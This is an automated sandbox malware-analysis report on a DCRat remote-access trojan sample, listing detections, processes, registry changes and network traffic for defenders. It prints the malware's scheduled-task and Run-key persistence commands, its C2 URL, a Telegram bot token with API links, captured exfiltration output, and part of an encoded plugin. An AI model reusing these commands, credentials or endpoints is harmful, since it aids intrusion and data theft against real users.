Malware analysis incore.exe Malicious activity | ANY.RUN

Add for printing

File name:	incore.exe
Full analysis:	https://app.any.run/tasks/c4b57fa3-2703-49e6-bb0a-7b6ddb285421
Verdict:	Malicious activity
Threats:	DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Malware Trends Tracker >>>
Analysis date:	February 08, 2025, 12:42:37
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	dcrat rat evasion remote darkcrystal telegram netreactor ims-api generic susp-powershell wmi-base64
Indicators:
MIME:	application/vnd.microsoft.portable-executable
File info:	PE32 executable (GUI) Intel 80386, for MS Windows, 6 sections
MD5:	03D4E131A10BF6C41D45C0918A9E3EA5
SHA1:	E067835A072CEB0D3CC3DD12E8A6D1A43F4D8BB7
SHA256:	5DAAB1D2EE0966832A50B6CC7635707A18D81105D51614C75D106C16FF8012C2
SSDEEP:	98304:Oyi35HqQ7YRzuyk5uvSJsi8FSUu1A4YK5GBOaicL2EoGgruauozi:1YEMW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 240 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: 180 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Uses sleep, probably for evasion detection (SCRIPT)
  - wscript.exe (PID: 6316)
- DCRAT mutex has been found
  - hypercomCrtMonitor.exe (PID: 5964)
  - dasHost.exe (PID: 6560)
- Changes the autorun value in the registry
  - hypercomCrtMonitor.exe (PID: 5964)
- Connects to the CnC server
  - dasHost.exe (PID: 6560)
- DARKCRYSTAL has been detected (SURICATA)
  - dasHost.exe (PID: 6560)
- DCRAT has been detected (YARA)
  - dasHost.exe (PID: 6560)
SUSPICIOUS
- Starts CMD.EXE for commands execution
  - wscript.exe (PID: 6316)
  - hypercomCrtMonitor.exe (PID: 5964)
- Reads security settings of Internet Explorer
  - incore.exe (PID: 6248)
  - hypercomCrtMonitor.exe (PID: 5964)
- Executable content was dropped or overwritten
  - incore.exe (PID: 6248)
  - hypercomCrtMonitor.exe (PID: 5964)
  - csc.exe (PID: 2212)
  - dasHost.exe (PID: 6560)
- Executing commands from a ".bat" file
  - wscript.exe (PID: 6316)
  - hypercomCrtMonitor.exe (PID: 5964)
- Runs shell command (SCRIPT)
  - wscript.exe (PID: 6316)
- Process drops legitimate windows executable
  - hypercomCrtMonitor.exe (PID: 5964)
- Executed via WMI
  - schtasks.exe (PID: 4764)
  - schtasks.exe (PID: 5748)
  - schtasks.exe (PID: 5032)
  - schtasks.exe (PID: 1556)
  - schtasks.exe (PID: 4980)
  - schtasks.exe (PID: 4672)
  - schtasks.exe (PID: 6032)
  - schtasks.exe (PID: 3928)
  - schtasks.exe (PID: 3732)
  - schtasks.exe (PID: 4592)
  - schtasks.exe (PID: 3640)
  - schtasks.exe (PID: 6452)
  - schtasks.exe (PID: 5036)
  - schtasks.exe (PID: 6364)
  - schtasks.exe (PID: 3848)
  - schtasks.exe (PID: 4392)
  - schtasks.exe (PID: 6340)
  - schtasks.exe (PID: 3836)
- Likely accesses (executes) a file from the Public directory
  - schtasks.exe (PID: 4980)
  - schtasks.exe (PID: 4672)
  - schtasks.exe (PID: 3848)
- Reads the date of Windows installation
  - hypercomCrtMonitor.exe (PID: 5964)
- Starts application with an unusual extension
  - cmd.exe (PID: 5628)
- Probably delay the execution using 'w32tm.exe'
  - cmd.exe (PID: 5628)
- Process communicates with Telegram (possibly using it as an attacker's C2 server)
  - dasHost.exe (PID: 6560)
- There is functionality for taking screenshot (YARA)
  - dasHost.exe (PID: 6560)
- Checks for external IP
  - dasHost.exe (PID: 6560)
  - svchost.exe (PID: 2192)
- Possible usage of Discord/Telegram API has been detected (YARA)
  - dasHost.exe (PID: 6560)
- The process creates files with name similar to system file names
  - hypercomCrtMonitor.exe (PID: 5964)
INFO
- Reads the computer name
  - incore.exe (PID: 6248)
  - dasHost.exe (PID: 6560)
  - hypercomCrtMonitor.exe (PID: 5964)
- Drops encrypted VBS script (Microsoft Script Encoder)
  - incore.exe (PID: 6248)
- Checks supported languages
  - incore.exe (PID: 6248)
  - hypercomCrtMonitor.exe (PID: 5964)
  - csc.exe (PID: 2212)
  - cvtres.exe (PID: 5696)
  - chcp.com (PID: 6552)
  - dasHost.exe (PID: 6560)
- Process checks computer location settings
  - incore.exe (PID: 6248)
  - hypercomCrtMonitor.exe (PID: 5964)
- Reads the machine GUID from the registry
  - hypercomCrtMonitor.exe (PID: 5964)
  - csc.exe (PID: 2212)
  - dasHost.exe (PID: 6560)
- Reads Environment values
  - hypercomCrtMonitor.exe (PID: 5964)
  - dasHost.exe (PID: 6560)
- The sample compiled with english language support
  - hypercomCrtMonitor.exe (PID: 5964)
- Create files in a temporary directory
  - hypercomCrtMonitor.exe (PID: 5964)
  - cvtres.exe (PID: 5696)
- Creates files or folders in the user directory
  - csc.exe (PID: 2212)
- Changes the display of characters in the console
  - cmd.exe (PID: 5628)
- Disables trace logs
  - dasHost.exe (PID: 6560)
- Checks proxy server information
  - dasHost.exe (PID: 6560)
- Reads the software policy settings
  - dasHost.exe (PID: 6560)
- .NET Reactor protector has been detected
  - dasHost.exe (PID: 6560)
- Found Base64 encoded reference to WMI classes (YARA)
  - dasHost.exe (PID: 6560)
- Found Base64 encoded access to Windows Defender via PowerShell (YARA)
  - dasHost.exe (PID: 6560)
- Failed to create an executable file in Windows directory
  - hypercomCrtMonitor.exe (PID: 5964)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

ims-api

(PID) Process(6560) dasHost.exe

Telegram-Tokens (1)7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U

Telegram-Info-Links

7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U

Get info about bothttps://api.telegram.org/bot7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U/getMe

Get incoming updateshttps://api.telegram.org/bot7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U/getUpdates

Get webhookhttps://api.telegram.org/bot7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U/getWebhookInfo

Delete webhookhttps://api.telegram.org/bot7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U/deleteWebhook

Drop incoming updateshttps://api.telegram.org/bot7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U/deleteWebhook?drop_pending_updates=true

Telegram-Requests

Token7323575349:AAF8153fa71q5xpXhmOjB3L_BqSQXG8r32U

End-PointsendPhoto

Args

Telegram-Responses

oktrue

result

message_id2237

from

id7323575349

is_bottrue

first_nameюзеры чпеееек

usernameuseeeerschep_bot

chat

id1584023533

first_nameЗахар

usernamesantiegomq

typeprivate

date1739018603

photo

file_idAgACAgIAAxkDAAIIvWenUWucQ3B3UKr55xJZ_yqMB_U9AALv5TEbxjtBSTvlH0dXiMi5AQADAgADcwADNgQ

file_unique_idAQAD7-UxG8Y7QUl4

file_size869

width90

height51

file_idAgACAgIAAxkDAAIIvWenUWucQ3B3UKr55xJZ_yqMB_U9AALv5TEbxjtBSTvlH0dXiMi5AQADAgADbQADNgQ

file_unique_idAQAD7-UxG8Y7QUly

file_size9488

width320

height180

file_idAgACAgIAAxkDAAIIvWenUWucQ3B3UKr55xJZ_yqMB_U9AALv5TEbxjtBSTvlH0dXiMi5AQADAgADeAADNgQ

file_unique_idAQAD7-UxG8Y7QUl9

file_size37074

width800

height450

file_idAgACAgIAAxkDAAIIvWenUWucQ3B3UKr55xJZ_yqMB_U9AALv5TEbxjtBSTvlH0dXiMi5AQADAgADeQADNgQ

file_unique_idAQAD7-UxG8Y7QUl-

file_size54810

width1280

height720

captionnew user connect ! ID: 8591bdf2ffdeae71b88ebe7ac40dcd90798ecb78 Comment: Username: admin PC Name: DESKTOP-JGLLJLD IP: 84.17.48.203 GEO: DE

caption_entities

offset119

length12

typeurl

DcRat

(PID) Process(6560) dasHost.exe

C2 (1)http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php

Options

Version5.0.1

C2 (1)http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php

Options

Version5.0.1

PluginsTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAKX/2QAAAAAAAAAAOAAIiALAQgAAEYBAAAGAAAAAAAA7mUBAAAgAAAAgAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAADAAQAAAgAAm0ACAAMAQIUA...

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win64 Executable (generic) (64.6)
.dll	\|	Win32 Dynamic Link Library (generic) (15.4)
.exe	\|	Win32 Executable (generic) (10.5)
.exe	\|	Generic Win/DOS Executable (4.6)
.exe	\|	DOS Executable Generic (4.6)

EXIF

EXE

MachineType:	Intel 386 or later, and compatibles
TimeStamp:	2022:03:03 13:15:57+00:00
ImageFileCharacteristics:	Executable, 32-bit
PEType:	PE32
LinkerVersion:	14.3
CodeSize:	203776
InitializedDataSize:	261632
UninitializedDataSize:	-
EntryPoint:	0x1f530
OSVersion:	5.1
ImageVersion:	-
SubsystemVersion:	5.1
Subsystem:	Windows GUI

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

158

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

1556

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\fontCrtmonitor\dwm.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

2192

C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache

C:\Windows\System32\svchost.exe

services.exe

User:

NETWORK SERVICE

Company:

Microsoft Corporation

Integrity Level:

SYSTEM

Description:

Host Process for Windows Services

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll

2212

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\tz243x22.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

hypercomCrtMonitor.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Visual C# Command Line Compiler

Exit code:

Version:

4.8.9037.0 built by: NET481REL1

Modules

Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ole32.dll

3640

schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 12 /tr "'C:\fontCrtmonitor\ctfmon.exe'" /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3732

schtasks.exe /create /tn "dasHost" /sc ONLOGON /tr "'C:\fontCrtmonitor\dasHost.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3836

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\fontCrtmonitor\dwm.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3848

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Videos\dllhost.exe'" /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

3928

schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 11 /tr "'C:\fontCrtmonitor\dasHost.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4392

schtasks.exe /create /tn "hypercomCrtMonitorh" /sc MINUTE /mo 5 /tr "'C:\fontCrtmonitor\hypercomCrtMonitor.exe'" /rl HIGHEST /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

4592

schtasks.exe /create /tn "dasHostd" /sc MINUTE /mo 14 /tr "'C:\fontCrtmonitor\dasHost.exe'" /f

C:\Windows\System32\schtasks.exe

—

WmiPrvSE.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Task Scheduler Configuration Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

4 659

Read events

4 636

Write events

Delete events

Modification events


(PID) Process:	(6248) incore.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbe\OpenWithProgids
Operation:	write	Name:	VBEFile
Value:
(PID) Process:	(5964) hypercomCrtMonitor.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\fe1a1fe75de18096feef012f667f36e3f6269434
Operation:	write	Name:	b09dcf7af1e770a76203696bb0feba3173b6d10d
Value: H4sIAAAAAAAEAItWcraKiUnLzytxLirJzc/LLMkviolJKc/VS61IVdLBKlucWlSWmZxajKQkFChWHBMTUJqUk5kcExOWmZKaD+Sn5ORk5BeX4DErJbHYA7+K5JI0IBuPgozKgtSi5PxcoJgvRAysOBYApouwftsAAAA=
(PID) Process:	(5964) hypercomCrtMonitor.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	services
Value: "C:\fontCrtmonitor\services.exe"
(PID) Process:	(5964) hypercomCrtMonitor.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	dllhost
Value: "C:\Users\Public\Videos\dllhost.exe"
(PID) Process:	(5964) hypercomCrtMonitor.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	dasHost
Value: "C:\fontCrtmonitor\dasHost.exe"
(PID) Process:	(5964) hypercomCrtMonitor.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	dwm
Value: "C:\fontCrtmonitor\dwm.exe"
(PID) Process:	(5964) hypercomCrtMonitor.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	ctfmon
Value: "C:\fontCrtmonitor\ctfmon.exe"
(PID) Process:	(5964) hypercomCrtMonitor.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:	write	Name:	hypercomCrtMonitor
Value: "C:\fontCrtmonitor\hypercomCrtMonitor.exe"
(PID) Process:	(6560) dasHost.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(6560) dasHost.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dasHost_RASAPI32
Operation:	write	Name:	EnableAutoFileTracing
Value: 0

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
5964	hypercomCrtMonitor.exe	C:\Users\admin\Desktop\nRSDXaCG.log		executable
		MD5:E9CE850DB4350471A62CC24ACB83E859	SHA256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
5964	hypercomCrtMonitor.exe	C:\fontCrtmonitor\ctfmon.exe		executable
		MD5:2A6E3F3275D854BF07ABA2427BAA6610	SHA256:4AA398EB330D666B85164E1FDC28802C585071870E09576109523CDAFC10EE7B
5964	hypercomCrtMonitor.exe	C:\Users\admin\Desktop\fnJOnhmZ.log		executable
		MD5:69546E20149FE5633BCBA413DC3DC964	SHA256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
5964	hypercomCrtMonitor.exe	C:\fontCrtmonitor\dwm.exe		executable
		MD5:2A6E3F3275D854BF07ABA2427BAA6610	SHA256:4AA398EB330D666B85164E1FDC28802C585071870E09576109523CDAFC10EE7B
5964	hypercomCrtMonitor.exe	C:\Users\admin\Desktop\mUqvCanL.log		executable
		MD5:D8BF2A0481C0A17A634D066A711C12E9	SHA256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
5964	hypercomCrtMonitor.exe	C:\fontCrtmonitor\c5b4cb5e9653cc		text
		MD5:2FFC0455006E0789752E32398ADDF9E0	SHA256:122C18B256737462F0247DCB89587819F56168B3734D710BB275624446419A81
5964	hypercomCrtMonitor.exe	C:\fontCrtmonitor\2b63792a2dad99		text
		MD5:0FEBF193A46F92275C7FEE6EE8951BE5	SHA256:69D1F0C2B769E5944AD3FEEB58E78BF3C72AA495372275853B65C8A32A07043A
5964	hypercomCrtMonitor.exe	C:\Users\admin\Desktop\VFqyDFhr.log		executable
		MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0	SHA256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
5964	hypercomCrtMonitor.exe	C:\fontCrtmonitor\21b1a557fd31cc		text
		MD5:196DFD723B51A8E7D2A301FA9576A90B	SHA256:5D79EF2FE2E15BAADE0B4CC069164AE91772CFE0E0170420FB0A707724320A25
5964	hypercomCrtMonitor.exe	C:\fontCrtmonitor\6cb0b6c459d5d3		text
		MD5:49540A7E1ECE58A8F561770EE2DD2236	SHA256:2E6F3910FFC8A40D5A7455E37036FC79CE6CB0C7520A82A94A4B4AE22833F6F0

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
1176	svchost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
7068	SIHClient.exe	GET	200	2.16.253.202:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
7068	SIHClient.exe	GET	200	2.16.253.202:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6680	backgroundTaskHost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D	unknown	—	—	whitelisted
6560	dasHost.exe	POST	200	172.67.159.138:80	http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php	unknown	—	—	malicious
6560	dasHost.exe	POST	200	172.67.159.138:80	http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php	unknown	—	—	malicious
6560	dasHost.exe	POST	200	172.67.159.138:80	http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php	unknown	—	—	malicious
6560	dasHost.exe	POST	200	172.67.159.138:80	http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php	unknown	—	—	malicious
6560	dasHost.exe	POST	200	172.67.159.138:80	http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php	unknown	—	—	malicious
6560	dasHost.exe	POST	200	172.67.159.138:80	http://635207cm.nyashk.ru/Line_RequestPolldefaulttestDatalifeLocalcentralDownloads.php	unknown	—	—	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
1144	RUXIMICS.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
748	svchost.exe	20.73.194.208:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
1176	svchost.exe	20.190.160.22:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
1176	svchost.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
1076	svchost.exe	23.218.210.69:443	go.microsoft.com	AKAMAI-AS	DE	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
